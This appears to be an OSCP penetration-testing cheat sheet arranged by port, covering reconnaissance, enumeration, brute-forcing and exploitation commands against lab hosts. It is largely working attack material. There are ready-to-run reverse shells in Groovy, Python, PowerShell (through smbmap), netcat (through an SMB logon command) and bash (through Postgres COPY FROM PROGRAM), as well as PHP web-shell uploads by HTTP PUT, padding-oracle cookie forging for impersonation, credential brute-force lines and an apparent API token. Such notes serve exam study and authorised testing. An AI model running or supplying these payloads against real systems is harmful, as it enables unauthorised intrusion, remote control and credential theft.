CTF

OSCP_Notes.md · master · LaGarian Smith / OSCP Cheat Sheet · GitLabGitLab

🎩Reconnaissance: NMAP🎩

INITIAL: TCP

sudo nmap -sC -sV -O 10.10.10.222

INITIAL: UPD

sudo nmap -sU -O 10.10.10.222

ALL PORTS:

sudo nmap -sC -sV -p- 10.10.10.222

SCRIPTS: https://nmap.org/nsedoc/scripts/

nmap --script vuln 10.10.10.8
ls -la /usr/share/nmap/scripts/

Automated Steps: AutoRecon: https://github.com/Tib3rius/AutoRecon

python3 autorecon.py -ct 4 -cs 10 -o ./ IP_1 IP_2 IP_3 IP_4

nmap -sS -sV -Pn -O -A -sC iptarget
-sS: SYN Scan
-sV: Version/Service Info
-Pn: skip host discovery
-O: OS scan
-A: OS version Detection
-sC: equivalent to --script=default

1 - Get the company IPs range X.X.X.X/24 2 - Run $ nmap -p 80,448,8080 IP/24 -oN file.txt 3 - Use any IP extractor or API in case of automation or bash then save it on IPs.txt 4 - run $ httpx -l IPs.txt -o final.txt 5 - run $ nuclei -l final.txt

/etc/hosts

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.11.234 website.htb

┌──(kali💀kali)-[~]
└─$ sudo echo "10.10.10.234 website.htb" >> /etc/hosts

🎩Port 80 - Web server🎩

WAP:

https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
https://chromewebstore.google.com/detail/wappalyzer-technology-pro/gppongmhjkpfnbhagpmjfkannfbllamg

CMS Explorer

whatweb -a3 https://10.10.10.236/ -v

Navigate

/robots.txt

SOURCE CODE:

Read for comments
- view-source:

HEADERS:

curl -i 10.11.1.111
curl -i -L 10.11.1.111
curl -i -H "User-Agent:Mozilla/4.0" http://10.11.1.111:8080

Tip, if 429 add one of these headers:
Client-Ip: IP
X-Client-Ip: IP
X-Forwarded-For: IP
X-Forwarded-For: 127.0.0.1

BURP: - Proxy: HTTP history

SCANNERS:

nikto -h https://10.10.11.158

# Nikto with squid proxy
nikto -h 10.11.1.111 -useproxy http://10.11.1.111:4444

# WPSCAN
Ref: Maria, Fail, Shenzi, Nukem
https://www.hackingarticles.in/wordpress-reverse-shell/ 
http://192.168.137.167/wp-content/themes/twentynineteen/404.php # Url to execute reverse shell
Note: Use 'grep -R backup_scripts 2>/dev/null' to look for cron related directories. 

wpscan --url http://office.paper --api-token 0SnNawrbLxKv9EAVVtOxl4MCQ8NUleZa69qEYn5bDus $WPSCAN_API

# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
wpscan --url http://10.11.1.111
wpscan --url http://10.11.1.111 --enumerate vp
wpscan --url http://192.168.221.167/ -e u,ap --plugins-detection aggressive
wpscan --url http://10.11.1.111 --enumerate vt
wpscan --url http://10.11.1.111 --enumerate u
wpscan -e --url https://url.com

Check IP behing WAF:
https://IP.com/2020/01/22/discover-cloudflare-wordpress-ip/
pingback.xml:
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
 <param>
  <value>
   <string>http://10.0.0.1/hello/world</string>
  </value>
 </param>
 <param>
  <value>
   <string>https://IP.com/2020/01/22/hello-world/</string>
  </value>
 </param>
</params>
</methodCall>

# NESSUS
https://login.tenable.com/login

CRAWLER:

dirhunt https://url.com/
hakrwaler https://url.com/

DIR BRUTE FORCE:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u https://10.10.11.158 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

# Ffuf
ffuf -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','xml','.log' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://10.11.1.11/mvc/FUZZ

# Dirb not recursive
dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt

# Wfuzz
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.11.1.11/FUZZ

# GoBuster
gobuster dir -u http://10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
gobuster dir -e -u http://10.11.1.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
gobuster dir -u http://$10.11.1.111 -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
gobuster dir -e -u http://10.11.1.111/ -w /usr/share/wordlists/dirb/common.txt

dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix

./dirsearch.py -u 10.10.10.157
./dirsearch.py -u http://192.168.101.125:8080 -e html,php,asp,aspx,js,elf,txt -x 404,403,401,500 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
./dirsearch.py -u http://192.168.86.125 -e html,php,asp,aspx,js,elf,txt -x 404,403,401,500 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

medusa -h 10.11.1.111 -u admin -P wordlist.txt -M http -m DIR:/test -T 10

FUZZER:

┌──(kali💀kali)-[~]
└─$ wfuzz -u https://streamio.htb -H "Host: FUZZ.streamio.htb" -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt --hh 315

┌──(kali💀kali)-[~]
└─$ wfuzz -u http://streamio.htb -H "Host: FUZZ.streamio.htb" -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt --hh 703

ffuf -recursion -c -e '.htm','.php','.html','.js','.txt','.zip','.bak','.asp','.aspx','.xml' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://url.com/FUZZ

dirsearch -r -f -u https://crm.comprarcasa.pt --extensions=htm,html,asp,aspx,txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --request-by-hostname -t 40

VHOSTS:

https://github.com/jobertabma/virtual-host-discovery
$ ruby scan.rb --ip=192.168.1.101 --host=domain.tld

Enum vhosts
$ fierce -dns example.com

Find Vhosts in non resolvable domains
https://github.com/dariusztytko/vhosts-sieve
$ python3 vhosts-sieve.py -d domains.txt -o vhosts.txt

#IIS
#ViewState:
https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC

#WebResource.axd:
https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py

#ShortNames
https://github.com/irsdl/IIS-ShortName-Scanner
┌──(kali㉿kali)-[~]
└─$ java -jar iis_shortname_scanner.jar 2 20 http://domain.es

#Jenkins
JENKINSIP/PROJECT//securityRealm/user/admin
JENKINSIP/jenkins/script

#Groovy RCE
def process = "cmd /c whoami".execute();println "${process.text}";
#Groovy RevShell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

# Joomscan
joomscan -u  http://10.11.1.111
joomscan -u  http://10.11.1.111 --enumerate-components

# PHP bypass disable_functions and open_basedir
# Chankro
https://github.com/TarlogicSecurity/Chankro
python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html

# Cookies error padding:
# Get cookie structure
padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
# Get cookie for other user (impersonation)
padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme'


# Google Analytics ID
https://github.com/Josue87/AnalyticsRelationships
$ cat subdomains.txt | analyticsrelationships

https://builtwith.com/relationships/united.com
https://builtwith.com/relationships/tag/UA-29214177
https://api.hackertarget.com/analyticslookup/?q=united.com
https://api.hackertarget.com/analyticslookup/?q=UA-16316580 


┌──(kali㉿kali)-[~]
└─$ curl -X POST -d @pingback.xml https://ip.com/xmlrpc.php

Enum User:
┌──(kali㉿kali)-[~]
└─$ for i in {1..50}; do curl -s -L -i https://ip.com/wordpress\?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done

# Joomscan
┌──(kali㉿kali)-[~]
└─$ joomscan -u  http://10.11.1.111
┌──(kali㉿kali)-[~]
└─$ joomscan -u  http://10.11.1.111 --enumerate-components

# Get header
┌──(kali㉿kali)-[~]
└─$ curl -i 10.11.1.111

# Get options
┌──(kali㉿kali)-[~]
└─$ curl -i -X OPTIONS 10.11.1.111

# With PUT option enabled:
┌──(kali㉿kali)-[~]
└─$ nmap -p 80 10.1.10.111 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'

┌──(kali㉿kali)-[~]
└─$ curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://10.1.10.111/test/cmd.php && http://10.1.10.111/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%210.1.10.111%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

# Get everything
┌──(kali㉿kali)-[~]
└─$ curl -i -L 10.11.1.111
┌──(kali㉿kali)-[~]
└─$ curl -i -H "User-Agent:Mozilla/4.0" http://10.11.1.111:8080

# Check for title and all links
┌──(kali㉿kali)-[~]
└─$ curl 10.11.1.111 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Look at page with just text
┌──(kali㉿kali)-[~]
└─$ curl 10.11.1.111 -s -L | html2text -width '99' | uniq

# Check if it is possible to upload
┌──(kali㉿kali)-[~]
└─$ curl -v -X OPTIONS http://10.11.1.111/
┌──(kali㉿kali)-[~]
└─$ curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://10.11.1.111/test/shell.php

# Simple curl POST request with login data
┌──(kali㉿kali)-[~]
└─$ curl -X POST http://10.11.1.11/centreon/api/index.php?action=authenticate -d 'username=centreon&password=wall'

┌──(kali㉿kali)-[~]
└─$ dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix

site:domain.com intext:user

🎩Port 443 - HTTPS🎩

Read the actual SSL CERT to:
- find out potential correct vhost to GET
- is the clock skewed
- any names that could be usernames for bruteforce/guessing.

sslscan 10.11.1.111:443

./testssl.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html

nmap -sV --script=ssl-heartbleed 10.1.10.111

mod_ssl,OpenSSL version Openfuck

🎩Port 21 - FTP🎩

ftp 10.10.10.10

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.111
USER anonymous / admin / found username
PASS anonymous / admin / found username
Try:
  get put (*.aspx,*.asp,*.php)

🎩Port 22 - SSH🎩

If you have usernames test login with username:username
Vulnerable Versions: 7.2p1
$ ssh -v user@10.10.1.111 id

Check Auth Methods:
$ ssh -v 10.10.1.111

SSH via Non-Standard Port:
$ ssh -v 10.10.1.111 -p 43022

SSH no matching key exchange method found:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 bob@10.11.1.136

Force Auth Method:
$ ssh -v 10.10.1.111 -o PreferredAuthentications=password

SSH Login with id_rsa file:
$ ssh -i id_rsa fox@192.168.152.126

SSH via Git:
$ GIT_SSH_COMMAND='ssh -i id_rsa -o IdentitiesOnly=yes' git clone ssh://git@192.168.212.125:43022/git-server (non-standard port)

$ GIT_SSH_COMMAND='ssh -i ~/Proving_Grounds/Hunit/id_rsa -o IdentitiesOnly=yes' git push (Done from within the git repo)

BruteForce:
patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

SSH FUZZ: 
https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt

cpan Net::SSH2
./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user

SSH-AUDIT
https://github.com/arthepsy/ssh-audit
• https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow
• https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP – Command Execution
• https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 – Username Enumeration
• https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client – Write Arbitrary Files

http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html

SSH Enum users < 7.7:
https://github.com/six2dez/ssh_enum_script
https://www.exploit-db.com/exploits/45233
python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"

🎩Port 25 - SMTP🎩

https://book.hacktricks.xyz/pentesting/pentesting-smtp#basic-information

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111

nc -nvvC 10.11.1.111 25
HELO foo<cr><lf>

telnet 10.11.1.111 25
VRFY root


# Enumerate SMTP Users
sudo smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 10.1.1.65

Send email unauth:
MAIL FROM:admin@admin.com
RCPT TO:DestinationEmail@DestinationDomain.com
DATA
test

.

Receive:
250 OK

🎩Port 53 - DNS🎩

https://centralops.net
https://viewdns.info/
https://phpinfo.me/domain
http://bgp.he.net/
https://bgpview.io/
https://suip.biz/
https://dnsdumpster.com/
https://www.whoxy.com/
http://ipv4info.com/
https://rapiddns.io/
https://myip.ms/
https://www.reversewhois.io/?
https://www.whoxy.com/reverse-whois/
https://reverse-whois.whoisxmlapi.com/api
https://host.io/dashboard

https://github.com/projectdiscovery/dnsx
$ dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -silent -l subdomains.txt

DNS wordlists
https://gist.githubusercontent.com/six2dez/a307a04a222fab5a57466c51e1569acf/raw
https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt
https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a

# Domain Recon
https://centralops.net
https://viewdns.info/
https://phpinfo.me/domain
http://bgp.he.net/
https://bgpview.io/
https://suip.biz/
https://dnsdumpster.com/
https://www.whoxy.com/
http://ipv4info.com/
https://rapiddns.io/
https://myip.ms/
https://www.reversewhois.io/?
https://www.whoxy.com/reverse-whois/
https://reverse-whois.whoisxmlapi.com/api
https://host.io/dashboard

🎩Port 69 - UDP - TFTP🎩

This is used for tftp-server.
- Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.
- Checks of FTP Port 21.

┌──(kali㉿kali)-[~]
└─$ nmap -p69 --script=tftp-enum.nse 10.11.1.111

🎩Port 79 - Finger🎩

Ref: HTB Sunday

┌──(kali㉿kali)-[~]
└─$ ./finger-user-enum.pl -U /usr/share/seclists/Seclists/Usernames/Names/names.txt -t 10.10.10.76

🎩Port 88 - Kerberos🎩

https://viperone.gitbook.io/pentest-everything/resources/cheat-sheets/kerberoast
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
	
- MS14-068
- GetUserSPNs

GET USERS:
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP

use auxiliary/gather/kerberos_enumusers

python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
https://www.tarlogic.com/blog/como-funciona-kerberos/
https://www.tarlogic.com/blog/como-atacar-kerberos/

Rubeus.exe
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe

🎩Port 110 - Pop3🎩

telnet 10.11.1.111
USER pelle@10.11.1.111
PASS admin

or:

USER pelle
PASS admin

# List all emails
list

# Retrieve email number 5, for example
retr 9

🎩Port 111 - Rpcbind🎩

rpcinfo -p 10.11.1.111  # enum NFS shares

showmount -e 10.11.1.111

mount -t nfs 10.11.1.111:/ /mnt -o nolock     # mount remote share to your local machine

rpcclient -U "" 10.11.1.111
	srvinfo
	enumdomusers
	getdompwinfo
	querydominfo
	netshareenum
	netshareenumall

🎩Port 135 - MSRPC🎩

┌──(kali㉿kali)-[~]
└─$ nmap 10.11.1.111 --script=msrpc-enum

┌──(kali㉿kali)-[~]
└─$ msf > use exploit/windows/dcerpc/ms03_026_dcom

🎩Port 139/445 - SMB🎩

# Enum hostname
enum4linux -n 10.11.1.111
enum4linux -a 10.10.11.152
nmblookup -A 10.11.1.111
nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111
nmap -Pn -d --script=smb-enum-users -p 445 10.10.11.158

# Get Version
smbver.sh 10.11.1.111
Msfconsole;use scanner/smb/smb_version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\\\10.11.1.111

# Get Shares
smbmap -H  10.11.1.111 -R <sharename>
sudo smbmap -H 10.11.1.136 -R --download "Bob Share\Draft Contract Mr. Yamamoto.txt" # Connect to a share with a space & download files
echo exit | smbclient -L \\\\10.11.1.111
smbclient \\\\10.11.1.111\\<share>
smbclient -L //10.11.1.111 -N
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
smbclient -L \\\\10.11.1.111\\

# Check null sessions
smbmap -H 10.11.1.111
rpcclient -U "" -N 10.11.1.111
smbclient //10.11.1.111/IPC$ -N

# Exploit null sessions
enum -s 10.11.1.111
enum -U 10.11.1.111
enum -P 10.11.1.111
enum4linux -a 10.11.1.111
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111

# Connect to username shares
smbclient //10.11.1.111/share -U username

# Connect with a user and password
smbclient -U "fox%iparalipomenidellabatracomiomachia"  //192.168.123.157/

# Connect to share anonymously
smbclient \\\\10.11.1.111\\<share>
smbclient //10.11.1.111/<share>
smbclient //10.11.1.111/<share\ name>
smbclient //10.11.1.111/<""share name"">
rpcclient -U " " 10.11.1.111
rpcclient -U " " -N 10.11.1.111

# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111

# Check common security concerns
msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc

# Extra validation
msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc

# Multi exploits
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run

# Bruteforce login
medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv
nmap –script smb-brute 10.11.1.111

# nmap smb enum & vuln
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111

# Mount smb volume linux
mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

# rpcclient commands
rpcclient -U "" 10.11.1.111
	srvinfo
	enumdomusers
	getdompwinfo
	querydominfo
	netshareenum
	netshareenumall

# Run cmd over smb from linux
winexe -U username //10.11.1.111 "cmd.exe" --system

#smb reverse shell with "logon" cmd
logon "/=`nc 10.10.14.5 4444 -e /bin/bash`"

# smbmap
smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum

smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE

smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing

smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 

# Reverse Shell

# Check
\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

🎩Port 143/993 - IMAP🎩

telnet 10.11.1.111 143 #Connect to read emails

openssl s_client -connect 10.11.1.111:993 -quiet  #Encrypted connection

🎩Port 161/162 UDP - SNMP🎩

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111

snmp-check 10.11.1.111 -c public|private|community

🎩Port 389,636 - LDAP🎩

nmap -p 389 --script ldap-search.nse 10.10.10.161

ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"

ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'

ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password'

patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'

https://github.com/MegaManSec/LDAP-Monitoring-Watchdog

# LDAP Interaction
As default, Interactsh server support LDAP interaction for the payload included in search query, additionally ldap flag can be used for complete logging.

┌──(kali💀kali)-[~]
└─$ interactsh-server -domain hackwithautomation.com -sa -ldap
    _       __                       __       __  
   (_)___  / /____  _________ ______/ /______/ /_ 
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/ 

[INF] Client Token: deb58fc151e6f0e53d448be3eb14cd7a11590d8950d142b9cd1abac3c2e3e7bc
[INF] Listening with the following services:
[DNS] Listening on UDP 157.230.223.165:53
[LDAP] Listening on TCP 157.230.223.165:389
[HTTP] Listening on TCP 157.230.223.165:80
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53

https://ldapwiki.com/wiki/LDAP%20Query%20Examples

🎩Port 500 - ISAKMP IKE🎩

ike-scan 10.11.1.111

🎩Port 513 - Rlogin🎩

apt install rsh-client

rlogin -l root 10.11.1.111

🎩Port 541 - FortiNet SSLVPN🎩

https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png

https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/?__cf_chl_jschl_tk__=42e37b31a0585f7dae3dbce18cafde7c39b81976-1578385705-0-AcuYzrPMO1OuMo59JSPYyzZjiXNbMAIl6sKiXwhQRbMUMZq1Kp3VmWqIVXWZdzTZgFCecXue1Z6xXxU-Rql_GT_ovKiar_-i0CUCKFS85bfNXnUzuOuIwomXje-kH87mNbVHzzh9ediRfVWbJjwtO-ttLEYi7quczLlHQk38UqcumrARs77RrK2mj9zOb8Uwhv6av4QZ9od4fgAIl-F4Kff26MPQjs4LRHsgk5zH6RVwFMP8NdOnCrrzkkGH6_R9Dtw89_QtiOsH1nKB0hBDbtJ2O9AkkMDqw7tl1ip_pVDfnw1lvaZtFq1sRqgYwpan-n6n9f58Xdjcj2UGFKdE32OS7Ete8X7RwXUV9FGUSOhAM5_iK0kMNJg3mskrFVQz0lONaZVvFRdf_1rp69J4oRVat1m7KIQEGpRDe4OvYUb7pfQkNKLcK5s_lVIj2SAJQQ

🎩Port 554 - RTSP🎩

Web interface, transfer images, streaming

🎩Port 873 - Rsync🎩

https://book.hacktricks.xyz/pentesting/873-pentesting-rsync

nc -vn 192.168.152.126 873

nmap -sV --script "rsync-list-modules" -p 873  192.168.152.126 --List Shares

rsync -av /home/kali/.ssh rsync://fox@192.168.152.126/fox/.ssh

🎩Port 1030/1032/1033/1038🎩

Used by RPC to connect in domain network.

🎩Port 1433 - MSSQL🎩

nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111

use auxiliary/scanner/mssql/mssql_ping

use auxiliary/scanner/mssql/mssql_login

use exploit/windows/mssql/mssql_payload

sqsh -S 10.11.1.111 -U sa
	xp_cmdshell 'date'
  	go

🎩Port 1521 - Oracle🎩

oscanner -s 10.11.1.111 -P 1521

tnscmd10g version -h 10.11.1.111

tnscmd10g status -h 10.11.1.111

nmap -p 1521 -A 10.11.1.111

nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute

MSF: good modules under auxiliary/admin/oracle and scanner/oracle

./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521

./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521

./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE

Upload reverse shell with ODAT:
./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe

and run it:
./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe

🎩Port 2049 - NFS🎩

showmount -e 10.11.1.111

If you find anything you can mount it like this:

mount 10.11.1.111:/ /tmp/NFS

mount -t 10.11.1.111:/ /tmp/NFS

🎩Port 2100 - Oracle XML DB🎩

Default passwords:
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
┌──(kali㉿kali)-[~]
└─$ FTP:
	sys:sys
	scott:tiger

🎩Port 3306 - MySQL🎩

https://book.hacktricks.xyz/pentesting/pentesting-mysql#basic-information

nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306

mysql --host=10.11.1.111 -u root -p

MYSQL UDF
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

🎩Port 3339 - Oracle web interface🎩

Basic info about web service (apache, nginx, IIS)

🎩Port 3389 - RDP 🎩

nmap -p 3389 --script=rdp-vuln-ms12-020.nse

xfreerdp /u:bill /p:Password! /v:10.11.1.111

rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111

rdesktop -u guest -p guest 10.11.1.111 -g 94%

ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111

🎩Port 5985 - WinRM 🎩

https://github.com/Hackplayers/evil-winrm
gem install evil-winrm
evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder

🎩 Port 5432/5433 - PostgreSQL🎩

https://book.hacktricks.xyz/pentesting/pentesting-postgresql
https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection#rce-from-version-9.3

psql -U <myuser> # Open psql console with user

psql -h <host> -U <username> -d <database> # Remote connection

psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection

\list # List Databases
\c postgres # Connect to DB
\d <table> # List tables

Priv Esc via Postgres

CREATE TABLE cmd(cmd_output text); 
COPY cmd FROM PROGRAM 'bash -i >& /dev/tcp/192.168.49.114/80 0>&1';

🎩 Port 5900 - VNC 🎩

nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111

vncviewer 127.0.0.1:5000 -passwd secret

